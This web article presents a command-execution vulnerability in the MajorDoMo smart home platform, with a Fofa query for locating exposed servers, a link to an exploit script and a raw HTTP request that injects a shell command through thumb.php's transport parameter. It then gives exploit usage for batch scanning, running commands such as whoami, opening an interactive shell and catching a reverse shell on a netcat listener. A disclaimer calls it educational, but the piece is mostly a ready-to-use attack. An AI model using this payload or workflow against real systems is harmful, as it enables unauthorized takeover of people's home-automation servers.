Command Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)

Disclaimer: Please do not use the techniques mentioned in this article for illegal testing. Any direct or indirect consequences and losses caused by the dissemination or use of the information or tools provided in this article are the sole responsibility of the user. The author of this article is not responsible for any adverse consequences. This article is for educational purposes only.Fofa:

title="MajordomoSL"

EXP (Exploit Script) Download Link:

https://github.com/jisi-001/MajorDoMo-thumb.git

POC

GET /modules/thumb/thumb.php?url=cnRzcDocm1EMe3&debug=1&transport=%7C%7C+id%3B HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Upgrade-Insecure-Requests: 1

Vulnerability Reproduction:Verify the existence of the vulnerability based on the POC:Command Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Vulnerability Exploitation:Use the author’s own EXP to detect the vulnerability:Single Detection:python .\MajorDoMoRceExp.py -u URLCommand Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Batch Detection:python .\MajorDoMoRceExp.py -r urls.txtCommand Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Execute Command:python .\MajorDoMoRceExp.py -u URL -c whoamiCommand Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Obtain Command Execution Environment (shell):python .\MajorDoMoRceExp.py -u URL -s ICommand Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Reverse Shell:python .\MajorDoMoRceExp.py -u URL -s R First, start listening on the server: nc -lvvp 4444Command Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Then execute the EXP script, input the server’s IP and listening PORTCommand Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Successfully reverse shellCommand Execution Vulnerability in MajorDoMo Smart Home Platform (Includes POC and EXP)Script Parameters:

options:  -h, --help            show this help message and exit  -u URL, --url URL     Please enter the URL to be tested  -f FILE, --file FILE  Please enter the file address with one URL per line  -c ..., --exec ...    Please enter the command, note: please detect the existence of the vulnerability before executing the command!  -s SHELL, --shell SHELL                        Input I to get shell, input R to reverse shell

Leave a Comment